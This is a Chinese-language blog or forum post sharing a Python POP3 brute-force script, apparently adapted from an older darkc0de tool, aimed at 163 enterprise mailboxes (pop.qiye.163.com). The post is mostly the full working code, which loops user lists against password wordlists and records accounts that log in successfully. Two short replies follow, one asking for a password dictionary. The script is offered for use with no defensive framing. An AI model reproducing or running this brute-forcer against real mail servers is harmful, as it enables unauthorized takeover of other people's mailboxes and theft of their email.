企业邮箱爆破小脚本

admin

总结了几种企业邮箱爆破的一些小技巧，直接贴出具体的爆破脚本吧。以163企业邮箱为例，目前这个是单线程的，也是从网上找到的爆破google邮箱的代码简单修改成的，只支持pop3协议。如图：

爆破模式类似burp的第四种模式，一个帐号对应多个密码挨个测试。所有的测试完才能看到结果，所以效率很低.


贴上代码：

1. #!usr/bin/python
   
2. #Email Pop3 Brute Forcer
   
3. #http://www.darkc0de.com
   
4. #d3hydr8[at]gmail[dot]com
   
5. #http://www.nxadmin.com
   
6. 
   
7. import threading, time, random, sys, poplib
   
8. from copy import copy
   
9. 
   
10. if len(sys.argv) !=3:
    
11.   print "\n\t   EmailPopBruteForcer v1.0"
    
12.   print "\t   --------------------------------------------------\n"
    
13.   print "\t    Usage: ./qmailpopbrute.py <userlist> <wordlist>\n"
    
14.   sys.exit(1)
    
15.    
    
16. server = "pop.qiye.163.com"
    
17. success = []
    
18. 
    
19. try:
    
20.     users = open(sys.argv[1], "r").readlines()
    
21. except(IOError):
    
22.     print "[-] Error: Check your userlist path\n"
    
23.     sys.exit(1)
    
24.    
    
25. try:
    
26.     words = open(sys.argv[2], "r").readlines()
    
27. except(IOError):
    
28.     print "[-] Error: Check your wordlist path\n"
    
29.     sys.exit(1)
    
30.    
    
31. try:
    
32.   pop = poplib.POP3(server,110)
    
33.   welcome = pop.getwelcome()
    
34.   print welcome
    
35.   pop.quit()
    
36. except (poplib.error_proto):
    
37.   welcome = "No Response"
    
38.   pass
    
39. 
    
40. def mailbruteforce(listuser,listpwd):
    
41.   if len(listuser) < 1 or len(listpwd) < 1 :
    
42.     print "An error occurred: No user or pass list"
    
43.     return 1
    
44.   for user in listuser:
    
45.     for value in listpwd :
    
46.       user = user.replace("\n","")
    
47.       value = value.replace("\n","")
    
48.       
    
49.       try:
    
50.         print "-"*12
    
51.          
    
52.         print "[+] User:",user,"Password:",value
    
53.         time.sleep(2)
    
54.         pop = poplib.POP3(server,110)
    
55.         pop.user(user)
    
56.         auth = pop.pass_(value)
    
57.         print auth
    
58.         if auth.split(' ')[0]!= "+OK" :
    
59.           pop.quit()
    
60.           print "unknown error !"
    
61.           continue
    
62.         if pop.stat()[1] is None or pop.stat()[1] < 1 :
    
63.           pop.quit()
    
64.           print "unknown error !"
    
65.           continue
    
66.         #print "\t\t\n\nLogin successful:",user, value
    
67.         #print "\t\tMail:",pop.stat()[0],"emails"
    
68.         #print "\t\tSize:",pop.stat()[1],"bytes\n\n"
    
69.         ret = (user,value,pop.stat()[0],pop.stat()[1])
    
70.         success.append(ret)
    
71.         #print len(success)
    
72.         pop.quit()
    
73.         break
    
74.       except:
    
75.         #print "An error occurred:", msg
    
76.         pass
    
77. 
    
78. 
    
79. 
    
80. print "\n\t EmailPopBruteForcer v1.0"
    
81. print "\t   --------------------------------------------------\n"
    
82. print "[+] Server:",server
    
83. print "[+] Port: 995"
    
84. print "[+] Users Loaded:",len(users)
    
85. print "[+] Words Loaded:",len(words)
    
86. print "[+] Server response:",welcome,"\n"
    
87. mailbruteforce(users,words)
    
88. 
    
89. print "\t[+] have weakpass :\t",len(success)
    
90. if len(success) >=1:
    
91.   for ret in success:
    
92.     print "\n\n[+] Login successful:",ret[0], ret[1]
    
93.     print "\t[+] Mail:",ret[2],"emails"
    
94.     print "\t[+] Size:",ret[3],"bytes\n"
    
95. print "\n[-] Done"

复制代码

求个密码字典

好麻烦啊，跑着太伤电脑